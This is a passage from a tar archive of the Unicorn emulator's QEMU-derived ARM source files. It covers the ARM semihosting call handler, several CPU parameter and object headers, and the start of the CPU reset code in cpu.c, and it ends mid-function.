*cpu, GuestFD *gf, target_ulong buf, uint32_t len); typedef uint32_t sys_isattyfn(ARMCPU *cpu, GuestFD *gf); typedef uint32_t sys_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset); typedef uint32_t sys_flenfn(ARMCPU *cpu, GuestFD *gf); static uint32_t host_closefn(ARMCPU *cpu, GuestFD *gf) { CPUARMState *env = &cpu->env; /* * Only close the underlying host fd if it's one we opened on behalf * of the guest in SYS_OPEN. */ if (gf->hostfd == STDIN_FILENO || gf->hostfd == STDOUT_FILENO || gf->hostfd == STDERR_FILENO) { return 0; } return set_swi_errno(env, close(gf->hostfd)); } static uint32_t host_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t ret; CPUARMState *env = &cpu->env; char *s = lock_user(VERIFY_READ, buf, len, 1); if (!s) { /* Return bytes not written on error */ return len; } ret = set_swi_errno(env, write(gf->hostfd, s, len)); unlock_user(s, buf, 0); if (ret == (uint32_t)-1) { ret = 0; } /* Return bytes not written */ return len - ret; } static uint32_t host_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t ret; CPUARMState *env = &cpu->env; char *s = lock_user(VERIFY_WRITE, buf, len, 0); if (!s) { /* return bytes not read */ return len; } do { ret = set_swi_errno(env, read(gf->hostfd, s, len)); } while (ret == -1 && errno == EINTR); unlock_user(s, buf, len); if (ret == (uint32_t)-1) { ret = 0; } /* Return bytes not read */ return len - ret; } static uint32_t host_isattyfn(ARMCPU *cpu, GuestFD *gf) { return isatty(gf->hostfd); } static uint32_t host_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { CPUARMState *env = &cpu->env; uint32_t ret = set_swi_errno(env, lseek(gf->hostfd, offset, SEEK_SET)); if (ret == (uint32_t)-1) { return -1; } return 0; } static uint32_t host_flenfn(ARMCPU *cpu, GuestFD *gf) { CPUARMState *env = &cpu->env; struct stat buf; uint32_t ret = set_swi_errno(env, fstat(gf->hostfd, &buf)); if (ret == (uint32_t)-1) { return -1; } return buf.st_size; } static uint32_t gdb_closefn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_cb, "close,%x", gf->hostfd); } static uint32_t gdb_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { arm_semi_syscall_len = len; return arm_gdb_syscall(cpu, arm_semi_cb, "write,%x,%x,%x", gf->hostfd, buf, len); } static uint32_t gdb_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { arm_semi_syscall_len = len; return arm_gdb_syscall(cpu, arm_semi_cb, "read,%x,%x,%x", gf->hostfd, buf, len); } static uint32_t gdb_isattyfn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_cb, "isatty,%x", gf->hostfd); } static uint32_t gdb_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { return arm_gdb_syscall(cpu, arm_semi_cb, "lseek,%x,%x,0", gf->hostfd, offset); } static uint32_t gdb_flenfn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_flen_cb, "fstat,%x,%x", gf->hostfd, arm_flen_buf(cpu)); } #define SHFB_MAGIC_0 0x53 #define SHFB_MAGIC_1 0x48 #define SHFB_MAGIC_2 0x46 #define SHFB_MAGIC_3 0x42 /* Feature bits reportable in feature byte 0 */ #define SH_EXT_EXIT_EXTENDED (1 << 0) #define SH_EXT_STDOUT_STDERR (1 << 1) static const uint8_t featurefile_data[] = { SHFB_MAGIC_0, SHFB_MAGIC_1, SHFB_MAGIC_2, SHFB_MAGIC_3, SH_EXT_EXIT_EXTENDED | SH_EXT_STDOUT_STDERR, /* Feature byte 0 */ }; static void init_featurefile_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = GuestFDFeatureFile; gf->featurefile_offset = 0; } static uint32_t featurefile_closefn(ARMCPU *cpu, GuestFD *gf) { /* Nothing to do */ return 0; } static uint32_t featurefile_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { /* This fd can never be open for writing */ CPUARMState *env = &cpu->env; errno = EBADF; return set_swi_errno(env, -1); } static uint32_t featurefile_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t i; CPUARMState *env = &cpu->env; char *s; s = lock_user(VERIFY_WRITE, buf, len, 0); if (!s) { return len; } for (i = 0; i < len; i++) { if (gf->featurefile_offset >= sizeof(featurefile_data)) { break; } s[i] = featurefile_data[gf->featurefile_offset]; gf->featurefile_offset++; } unlock_user(s, buf, len); /* Return number of bytes not read */ return len - i; } static uint32_t featurefile_isattyfn(ARMCPU *cpu, GuestFD *gf) { return 0; } static uint32_t featurefile_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { gf->featurefile_offset = offset; return 0; } static uint32_t featurefile_flenfn(ARMCPU *cpu, GuestFD *gf) { return sizeof(featurefile_data); } typedef struct GuestFDFunctions { sys_closefn *closefn; sys_writefn *writefn; sys_readfn *readfn; sys_isattyfn *isattyfn; sys_seekfn *seekfn; sys_flenfn *flenfn; } GuestFDFunctions; static const GuestFDFunctions guestfd_fns[] = { [GuestFDHost] = { .closefn = host_closefn, .writefn = host_writefn, .readfn = host_readfn, .isattyfn = host_isattyfn, .seekfn = host_seekfn, .flenfn = host_flenfn, }, [GuestFDGDB] = { .closefn = gdb_closefn, .writefn = gdb_writefn, .readfn = gdb_readfn, .isattyfn = gdb_isattyfn, .seekfn = gdb_seekfn, .flenfn = gdb_flenfn, }, [GuestFDFeatureFile] = { .closefn = featurefile_closefn, .writefn = featurefile_writefn, .readfn = featurefile_readfn, .isattyfn = featurefile_isattyfn, .seekfn = featurefile_seekfn, .flenfn = featurefile_flenfn, }, }; /* Read the input value from the argument block; fail the semihosting * call if the memory read fails. */ #define GET_ARG(n) do { \ if (is_a64(env)) { \ if (get_user_u64(arg ## n, args + (n) * 8)) { \ errno = EFAULT; \ return set_swi_errno(env, -1); \ } \ } else { \ if (get_user_u32(arg ## n, args + (n) * 4)) { \ errno = EFAULT; \ return set_swi_errno(env, -1); \ } \ } \ } while (0) #define SET_ARG(n, val) \ (is_a64(env) ? \ put_user_u64(val, args + (n) * 8) : \ put_user_u32(val, args + (n) * 4)) /* * Do a semihosting call. * * The specification always says that the "return register" either * returns a specific value or is corrupted, so we don't need to * report to our caller whether we are returning a value or trying to * leave the register unchanged. We use 0xdeadbeef as the return value * when there isn't a defined return value for the call. */ target_ulong do_arm_semihosting(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); target_ulong args; target_ulong arg0, arg1, arg2, arg3; char * s; int nr; uint32_t ret; uint32_t len; GuestFD *gf; if (is_a64(env)) { /* Note that the syscall number is in W0, not X0 */ nr = env->xregs[0] & 0xffffffffU; args = env->xregs[1]; } else { nr = env->regs[0]; args = env->regs[1]; } switch (nr) { case TARGET_SYS_OPEN: { int guestfd; GET_ARG(0); GET_ARG(1); GET_ARG(2); s = lock_user_string(arg0); if (!s) { errno = EFAULT; return set_swi_errno(env, -1); } if (arg1 >= 12) { unlock_user(s, arg0, 0); errno = EINVAL; return set_swi_errno(env, -1); } guestfd = alloc_guestfd(); if (guestfd < 0) { unlock_user(s, arg0, 0); errno = EMFILE; return set_swi_errno(env, -1); } if (strcmp(s, ":tt") == 0) { int result_fileno; /* * We implement SH_EXT_STDOUT_STDERR, so: * open for read == stdin * open for write == stdout * open for append == stderr */ if (arg1 < 4) { result_fileno = STDIN_FILENO; } else if (arg1 < 8) { result_fileno = STDOUT_FILENO; } else { result_fileno = STDERR_FILENO; } associate_guestfd(guestfd, result_fileno); unlock_user(s, arg0, 0); return guestfd; } if (strcmp(s, ":semihosting-features") == 0) { unlock_user(s, arg0, 0); /* We must fail opens for modes other than 0 ('r') or 1 ('rb') */ if (arg1 != 0 && arg1 != 1) { dealloc_guestfd(guestfd); errno = EACCES; return set_swi_errno(env, -1); } init_featurefile_guestfd(guestfd); return guestfd; } if (use_gdb_syscalls()) { arm_semi_open_guestfd = guestfd; ret = arm_gdb_syscall(cpu, arm_semi_open_cb, "open,%s,%x,1a4", arg0, (int)arg2+1, gdb_open_modeflags[arg1]); } else { ret = set_swi_errno(env, open(s, open_modeflags[arg1], 0644)); if (ret == (uint32_t)-1) { dealloc_guestfd(guestfd); } else { associate_guestfd(guestfd, ret); ret = guestfd; } } unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_CLOSE: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } ret = guestfd_fns[gf->type].closefn(cpu, gf); dealloc_guestfd(arg0); return ret; case TARGET_SYS_WRITEC: qemu_semihosting_console_outc(env, args); return 0xdeadbeef; case TARGET_SYS_WRITE0: return qemu_semihosting_console_outs(env, args); case TARGET_SYS_WRITE: GET_ARG(0); GET_ARG(1); GET_ARG(2); len = arg2; gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].writefn(cpu, gf, arg1, len); case TARGET_SYS_READ: GET_ARG(0); GET_ARG(1); GET_ARG(2); len = arg2; gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].readfn(cpu, gf, arg1, len); case TARGET_SYS_READC: return qemu_semihosting_console_inc(env); case TARGET_SYS_ISTTY: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].isattyfn(cpu, gf); case TARGET_SYS_SEEK: GET_ARG(0); GET_ARG(1); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].seekfn(cpu, gf, arg1); case TARGET_SYS_FLEN: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].flenfn(cpu, gf); case TARGET_SYS_TMPNAM: qemu_log_mask(LOG_UNIMP, "%s: SYS_TMPNAM not implemented", __func__); return -1; case TARGET_SYS_REMOVE: GET_ARG(0); GET_ARG(1); if (use_gdb_syscalls()) { ret = arm_gdb_syscall(cpu, arm_semi_cb, "unlink,%s", arg0, (int)arg1+1); } else { s = lock_user_string(arg0); if (!s) { errno = EFAULT; return set_swi_errno(env, -1); } ret = set_swi_errno(env, remove(s)); unlock_user(s, arg0, 0); } return ret; case TARGET_SYS_RENAME: GET_ARG(0); GET_ARG(1); GET_ARG(2); GET_ARG(3); if (use_gdb_syscalls()) { return arm_gdb_syscall(cpu, arm_semi_cb, "rename,%s,%s", arg0, (int)arg1+1, arg2, (int)arg3+1); } else { char *s2; s = lock_user_string(arg0); s2 = lock_user_string(arg2); if (!s || !s2) { errno = EFAULT; ret = set_swi_errno(env, -1); } else { ret = set_swi_errno(env, rename(s, s2)); } if (s2) unlock_user(s2, arg2, 0); if (s) unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_CLOCK: return clock() / (CLOCKS_PER_SEC / 100); case TARGET_SYS_TIME: return set_swi_errno(env, time(NULL)); case TARGET_SYS_SYSTEM: GET_ARG(0); GET_ARG(1); if (use_gdb_syscalls()) { return arm_gdb_syscall(cpu, arm_semi_cb, "system,%s", arg0, (int)arg1+1); } else { s = lock_user_string(arg0); if (!s) { errno = EFAULT; return set_swi_errno(env, -1); } ret = set_swi_errno(env, system(s)); unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_ERRNO: return get_swi_errno(env); case TARGET_SYS_GET_CMDLINE: { /* Build a command-line from the original argv. * * The inputs are: * * arg0, pointer to a buffer of at least the size * specified in arg1. * * arg1, size of the buffer pointed to by arg0 in * bytes. * * The outputs are: * * arg0, pointer to null-terminated string of the * command line. * * arg1, length of the string pointed to by arg0. */ char *output_buffer; size_t input_size; size_t output_size; int status = 0; const char *cmdline; GET_ARG(0); GET_ARG(1); input_size = arg1; /* Compute the size of the output string. */ cmdline = semihosting_get_cmdline(); if (cmdline == NULL) { cmdline = ""; /* Default to an empty line. */ } output_size = strlen(cmdline) + 1; /* Count terminating 0. */ if (output_size > input_size) { /* Not enough space to store command-line arguments. */ errno = E2BIG; return set_swi_errno(env, -1); } /* Adjust the command-line length. */ if (SET_ARG(1, output_size - 1)) { /* Couldn't write back to argument block */ errno = EFAULT; return set_swi_errno(env, -1); } /* Lock the buffer on the ARM side. */ output_buffer = lock_user(VERIFY_WRITE, arg0, output_size, 0); if (!output_buffer) { errno = EFAULT; return set_swi_errno(env, -1); } /* Copy the command-line arguments. */ pstrcpy(output_buffer, output_size, cmdline); /* Unlock the buffer on the ARM side. */ unlock_user(output_buffer, arg0, output_size); return status; } case TARGET_SYS_HEAPINFO: { target_ulong retvals[4]; target_ulong limit; int i; GET_ARG(0); limit = ram_size; /* TODO: Make this use the limit of the loaded application. */ retvals[0] = limit / 2; retvals[1] = limit; retvals[2] = limit; /* Stack base */ retvals[3] = 0; /* Stack limit. */ for (i = 0; i < ARRAY_SIZE(retvals); i++) { bool fail; if (is_a64(env)) { fail = put_user_u64(retvals[i], arg0 + i * 8); } else { fail = put_user_u32(retvals[i], arg0 + i * 4); } if (fail) { /* Couldn't write back to argument block */ errno = EFAULT; return set_swi_errno(env, -1); } } return 0; } case TARGET_SYS_EXIT: case TARGET_SYS_EXIT_EXTENDED: if (nr == TARGET_SYS_EXIT_EXTENDED || is_a64(env)) { /* * The A64 version of SYS_EXIT takes a parameter block, * so the application-exit type can return a subcode which * is the exit status code from the application. * SYS_EXIT_EXTENDED is an a new-in-v2.0 optional function * which allows A32/T32 guests to also provide a status code. */ GET_ARG(0); GET_ARG(1); if (arg0 == ADP_Stopped_ApplicationExit) { ret = arg1; } else { ret = 1; } } else { /* * The A32/T32 version of SYS_EXIT specifies only * Stopped_ApplicationExit as normal exit, but does not * allow the guest to specify the exit status code. * Everything else is considered an error. */ ret = (args == ADP_Stopped_ApplicationExit) ? 0 : 1; } gdb_exit(env, ret); exit(ret); case TARGET_SYS_SYNCCACHE: /* * Clean the D-cache and invalidate the I-cache for the specified * virtual address range. This is a nop for us since we don't * implement caches. This is only present on A64. */ if (is_a64(env)) { return 0; } /* fall through -- invalid for A32/T32 */ default: fprintf(stderr, "qemu: Unsupported SemiHosting SWI 0x%02x\n", nr); cpu_dump_state(cs, stderr, 0); abort(); } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/arm_ldst.h������������������������������������������������������������0000664�0000000�0000000�00000003442�14675241067�0020201�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM load/store instructions for code (armeb-user support) * * Copyright (c) 2012 CodeSourcery, LLC * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef ARM_LDST_H #define ARM_LDST_H #include "exec/translator.h" #include "qemu/bswap.h" #include <uc_priv.h> /* Load an instruction and return it in the standard little-endian order */ static inline uint32_t arm_ldl_code(CPUARMState *env, target_ulong addr, bool sctlr_b) { TCGContext *tcg_ctx = env->uc->tcg_ctx; return translator_ldl_swap(tcg_ctx, env, addr, bswap_code(sctlr_b)); } /* Ditto, for a halfword (Thumb) instruction */ static inline uint16_t arm_lduw_code(CPUARMState *env, target_ulong addr, bool sctlr_b) { TCGContext *tcg_ctx = env->uc->tcg_ctx; /* In big-endian (BE32) mode, adjacent Thumb instructions have been swapped within each word. Undo that now. */ // Unicorn: Note that we don't have any loader so this patch makes no sense. // And sctlr_b is 0 in aarch64. // if (sctlr_b) { // addr ^= 2; // } return translator_lduw_swap(tcg_ctx, env, addr, bswap_code(sctlr_b)); } #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/cpu-param.h�����������������������������������������������������������0000664�0000000�0000000�00000001217�14675241067�0020257�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM cpu parameters for qemu. * * Copyright (c) 2003 Fabrice Bellard * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef ARM_CPU_PARAM_H #define ARM_CPU_PARAM_H 1 #ifdef TARGET_AARCH64 # define TARGET_LONG_BITS 64 # define TARGET_PHYS_ADDR_SPACE_BITS 48 # define TARGET_VIRT_ADDR_SPACE_BITS 48 #else # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 40 # define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif /* * ARMv7 and later CPUs have 4K pages minimum, but ARMv5 and v6 * have to support 1K tiny pages. */ # define TARGET_PAGE_BITS_VARY # define TARGET_PAGE_BITS_MIN 10 #define NB_MMU_MODES 12 #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/cpu-qom.h�������������������������������������������������������������0000664�0000000�0000000�00000005121�14675241067�0017751�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU ARM CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #ifndef QEMU_ARM_CPU_QOM_H #define QEMU_ARM_CPU_QOM_H #include "hw/core/cpu.h" struct arm_boot_info; #define TYPE_ARM_CPU "arm-cpu" #define ARM_CPU(obj) ((ARMCPU *)obj) #define ARM_CPU_CLASS(klass) ((ARMCPUClass *)klass) #define ARM_CPU_GET_CLASS(obj) (&((ARMCPU *)obj)->cc) #define TYPE_ARM_MAX_CPU "max-" TYPE_ARM_CPU typedef struct ARMCPUInfo ARMCPUInfo; /** * ARMCPUClass: * @parent_reset: The parent class' reset handler. * * An ARM CPU model. */ typedef struct ARMCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ const ARMCPUInfo *info; void (*parent_reset)(CPUState *cpu); } ARMCPUClass; typedef struct ARMCPU ARMCPU; #define TYPE_AARCH64_CPU "aarch64-cpu" #define AARCH64_CPU_CLASS(klass) \ OBJECT_CLASS_CHECK(AArch64CPUClass, (klass), TYPE_AARCH64_CPU) #define AARCH64_CPU_GET_CLASS(obj) \ OBJECT_GET_CLASS(AArch64CPUClass, (obj), TYPE_AArch64_CPU) typedef struct AArch64CPUClass { /*< private >*/ ARMCPUClass parent_class; /*< public >*/ } AArch64CPUClass; void register_cp_regs_for_features(ARMCPU *cpu); /* Callback functions for the generic timer's timers. */ void arm_gt_ptimer_cb(void *opaque); void arm_gt_vtimer_cb(void *opaque); void arm_gt_htimer_cb(void *opaque); void arm_gt_stimer_cb(void *opaque); void arm_gt_hvtimer_cb(void *opaque); #define ARM_AFF0_SHIFT 0 #define ARM_AFF0_MASK (0xFFULL << ARM_AFF0_SHIFT) #define ARM_AFF1_SHIFT 8 #define ARM_AFF1_MASK (0xFFULL << ARM_AFF1_SHIFT) #define ARM_AFF2_SHIFT 16 #define ARM_AFF2_MASK (0xFFULL << ARM_AFF2_SHIFT) #define ARM_AFF3_SHIFT 32 #define ARM_AFF3_MASK (0xFFULL << ARM_AFF3_SHIFT) #define ARM_DEFAULT_CPUS_PER_CLUSTER 8 #define ARM32_AFFINITY_MASK (ARM_AFF0_MASK|ARM_AFF1_MASK|ARM_AFF2_MASK) #define ARM64_AFFINITY_MASK \ (ARM_AFF0_MASK|ARM_AFF1_MASK|ARM_AFF2_MASK|ARM_AFF3_MASK) #define ARM64_AFFINITY_INVALID (~ARM64_AFFINITY_MASK) #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/cpu.c�����������������������������������������������������������������0000664�0000000�0000000�00000215727�14675241067�0017171�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU ARM CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "sysemu/sysemu.h" #include "fpu/softfloat.h" #include <uc_priv.h> static void arm_cpu_set_pc(CPUState *cs, vaddr value) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; if (is_a64(env)) { env->pc = value; env->thumb = 0; } else { env->regs[15] = value & ~1; env->thumb = value & 1; } } static void arm_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* * It's OK to look at env for the current mode here, because it's * never possible for an AArch64 TB to chain to an AArch32 TB. */ if (is_a64(env)) { env->pc = tb->pc; } else { env->regs[15] = tb->pc; } } static bool arm_cpu_has_work(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); return (cpu->power_state != PSCI_OFF) && cs->interrupt_request & (CPU_INTERRUPT_FIQ | CPU_INTERRUPT_HARD | CPU_INTERRUPT_VFIQ | CPU_INTERRUPT_VIRQ | CPU_INTERRUPT_EXITTB); } static void arm_register_pre_el_change_hook(ARMCPU *cpu, ARMELChangeHookFn *hook, void *opaque) { ARMELChangeHook *entry = g_new0(ARMELChangeHook, 1); entry->hook = hook; entry->opaque = opaque; QLIST_INSERT_HEAD(&cpu->pre_el_change_hooks, entry, node); } static void arm_register_el_change_hook(ARMCPU *cpu, ARMELChangeHookFn *hook, void *opaque) { ARMELChangeHook *entry = g_new0(ARMELChangeHook, 1); entry->hook = hook; entry->opaque = opaque; QLIST_INSERT_HEAD(&cpu->el_change_hooks, entry, node); } static void cp_reg_reset(gpointer key, gpointer value, gpointer opaque) { /* Reset a single ARMCPRegInfo register */ ARMCPRegInfo *ri = value; ARMCPU *cpu = opaque; if (ri->type & (ARM_CP_SPECIAL | ARM_CP_ALIAS)) { return; } if (ri->resetfn) { ri->resetfn(&cpu->env, ri); return; } /* A zero offset is never possible as it would be regs[0] * so we use it to indicate that reset is being handled elsewhere. * This is basically only used for fields in non-core coprocessors * (like the pxa2xx ones). */ if (!ri->fieldoffset) { return; } if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(&cpu->env, ri) = ri->resetvalue; } else { CPREG_FIELD32(&cpu->env, ri) = ri->resetvalue; } } static void cp_reg_check_reset(gpointer key, gpointer value, gpointer opaque) { /* Purely an assertion check: we've already done reset once, * so now check that running the reset for the cpreg doesn't * change its value. This traps bugs where two different cpregs * both try to reset the same state field but to different values. */ ARMCPRegInfo *ri = value; #ifndef NDEBUG ARMCPU *cpu = opaque; uint64_t oldvalue, newvalue; #endif if (ri->type & (ARM_CP_SPECIAL | ARM_CP_ALIAS | ARM_CP_NO_RAW)) { return; } #ifndef NDEBUG oldvalue = read_raw_cp_reg(&cpu->env, ri); #endif cp_reg_reset(key, value, opaque); #ifndef NDEBUG newvalue = read_raw_cp_reg(&cpu->env, ri); assert(oldvalue == newvalue); #endif } static void arm_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); ARMCPU *cpu = ARM_CPU(s); ARMCPUClass *acc = ARM_CPU_GET_CLASS(cpu); CPUARMState *env = &cpu->env; acc->parent_reset(dev); memset(env, 0, offsetof(CPUARMState, end_reset_fields)); g_hash_table_foreach(cpu->cp_regs, cp_reg_reset, cpu); g_hash_table_foreach(cpu->cp_regs, cp_reg_check_reset, cpu); env->vfp.xregs[ARM_VFP_FPSID] = cpu->reset_fpsid; env->vfp.xregs[ARM_VFP_MVFR0] = cpu->isar.mvfr0; env->vfp.xregs[ARM_VFP_MVFR1] = cpu->isar.mvfr1; env->vfp.xregs[ARM_VFP_MVFR2] = cpu->isar.mvfr2; cpu->power_state = cpu->start_powered_off ? PSCI_OFF : PSCI_ON; s->halted = cpu->start_powered_off; if (arm_feature(env, ARM_FEATURE_IWMMXT)) { env->iwmmxt.cregs[ARM_IWMMXT_wCID] = 0x69051000 | 'Q'; } if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* 64 bit CPUs always start in 64 bit mode */ env->aarch64 = 1; /* Reset into the highest available EL */ if (arm_feature(env, ARM_FEATURE_EL3)) { env->pstate = PSTATE_MODE_EL3h; } else if (arm_feature(env, ARM_FEATURE_EL2)) { env->pstate = PSTATE_MODE_EL2h; } else { env->pstate = PSTATE_MODE_EL1h; } env->pc = cpu->rvbar; } /* * If the highest available EL is EL2, AArch32 will start in Hyp * mode; otherwise it starts in SVC. Note that if we start in * AArch64 then these values in the uncached_cpsr will be ignored. */ if (arm_feature(env, ARM_FEATURE_EL2) && !arm_feature(env, ARM_FEATURE_EL3)) { env->uncached_cpsr = ARM_CPU_MODE_HYP; } else { env->uncached_cpsr = ARM_CPU_MODE_SVC; } env->daif = PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F; if (arm_feature(env, ARM_FEATURE_M)) { uint32_t initial_msp; /* Loaded from 0x0 */ uint32_t initial_pc; /* Loaded from 0x4 */ // uint8_t *rom; uint32_t vecbase; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { env->v7m.secure = true; } else { /* This bit resets to 0 if security is supported, but 1 if * it is not. The bit is not present in v7M, but we set it * here so we can avoid having to make checks on it conditional * on ARM_FEATURE_V8 (we don't let the guest see the bit). */ env->v7m.aircr = R_V7M_AIRCR_BFHFNMINS_MASK; /* * Set NSACR to indicate "NS access permitted to everything"; * this avoids having to have all the tests of it being * conditional on ARM_FEATURE_M_SECURITY. Note also that from * v8.1M the guest-visible value of NSACR in a CPU without the * Security Extension is 0xcff. */ env->v7m.nsacr = 0xcff; } /* In v7M the reset value of this bit is IMPDEF, but ARM recommends * that it resets to 1, so QEMU always does that rather than making * it dependent on CPU model. In v8M it is RES1. */ env->v7m.ccr[M_REG_NS] = R_V7M_CCR_STKALIGN_MASK; env->v7m.ccr[M_REG_S] = R_V7M_CCR_STKALIGN_MASK; if (arm_feature(env, ARM_FEATURE_V8)) { /* in v8M the NONBASETHRDENA bit [0] is RES1 */ env->v7m.ccr[M_REG_NS] |= R_V7M_CCR_NONBASETHRDENA_MASK; env->v7m.ccr[M_REG_S] |= R_V7M_CCR_NONBASETHRDENA_MASK; } if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.ccr[M_REG_NS] |= R_V7M_CCR_UNALIGN_TRP_MASK; env->v7m.ccr[M_REG_S] |= R_V7M_CCR_UNALIGN_TRP_MASK; } if (cpu_isar_feature(aa32_vfp_simd, cpu)) { env->v7m.fpccr[M_REG_NS] = R_V7M_FPCCR_ASPEN_MASK; env->v7m.fpccr[M_REG_S] = R_V7M_FPCCR_ASPEN_MASK | R_V7M_FPCCR_LSPEN_MASK | R_V7M_FPCCR_S_MASK; } /* Unlike A/R profile, M profile defines the reset LR value */ env->regs[14] = 0xffffffff; env->v7m.vecbase[M_REG_S] = cpu->init_svtor & 0xffffff80; /* Load the initial SP and PC from offset 0 and 4 in the vector table */ vecbase = env->v7m.vecbase[env->v7m.secure]; #if 0 rom = rom_ptr(vecbase, 8); if (rom) { /* Address zero is covered by ROM which hasn't yet been * copied into physical memory. */ initial_msp = ldl_p(rom); initial_pc = ldl_p(rom + 4); } else #endif { /* Address zero not covered by a ROM blob, or the ROM blob * is in non-modifiable memory and this is a second reset after * it got copied into memory. In the latter case, rom_ptr * will return a NULL pointer and we should use ldl_phys instead. */ #ifdef UNICORN_ARCH_POSTFIX initial_msp = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(s->uc, s->as, vecbase); initial_pc = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(s->uc, s->as, vecbase + 4); #else initial_msp = ldl_phys(s->uc, s->as, vecbase); initial_pc = ldl_phys(s->uc, s->as, vecbase + 4); #endif } env->regs[13] = initial_msp & 0xFFFFFFFC; env->regs[15] = initial_pc & ~1; env->thumb = initial_pc & 1; } /* AArch32 has a hard highvec setting of 0xFFFF0000. If we are currently * executing as AArch32 then check if highvecs are enabled and * adjust the PC accordingly. */ if (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_V) { env->regs[15] = 0xFFFF0000; } /* M profile requires that reset clears the exclusive monitor; * A profile does not, but clearing it makes more sense than having it * set with an exclusive access on address zero. */ arm_clear_exclusive(env); env->vfp.xregs[ARM_VFP_FPEXC] = 0; if (arm_feature(env, 